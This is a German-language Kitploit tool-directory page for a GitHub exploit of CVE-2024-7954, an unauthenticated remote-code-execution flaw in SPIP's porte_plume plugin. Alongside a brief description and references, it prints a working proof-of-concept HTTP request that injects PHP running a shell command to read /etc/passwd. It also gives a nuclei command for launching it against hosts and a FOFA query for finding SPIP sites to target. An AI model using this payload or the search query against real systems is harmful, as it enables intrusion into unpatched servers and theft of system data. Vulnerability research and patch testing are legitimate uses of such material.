Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-7954-RCE — Nicht authentifizierte Remote-Code-Ausführung in SPIP-Versionen bis einschließlich 4.2.12 | Kitploit
Tools/GitHubGitHub/gh-ost00/cve-2024-7954-rce
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubgh-ost00/cve-2024-7954-rce

CVE-2024-7954-RCE

Nicht authentifizierte Remote-Code-Ausführung in SPIP-Versionen bis einschließlich 4.2.12

Repository anzeigen
92vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Beschreibung

Das porte_plume-Plugin, das von SPIP vor Version 4.30-alpha2, 4.2.13 und 4.1.16 verwendet wird, ist anfällig für eine Schwachstelle zur Ausführung beliebigen Codes. Ein entfernter, nicht authentifizierter Angreifer kann beliebigen PHP-Code als SPIP-Benutzer ausführen, indem er eine speziell präparierte HTTP-Anfrage sendet.

Exploit (Proof of concept)

root@kitploit:~
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB

Verwendung

root@kitploit:~
nuclei --target {host.com} -t CVE-2024-7954.yaml

FOFA-Abfrage

root@kitploit:~
app="SPIP"

Referenzen

  • https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-0-alpha2-SPIP-4-2-13-SPIP-4.html
  • https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_1_the_feather/
  • https://vulncheck.com/advisories/spip-porte-plume
  • https://nvd.nist.gov/vuln/detail/CVE-2024-7954
  • https://security-tracker.debian.org/tracker/CVE-2024-7954
Tool herunterladen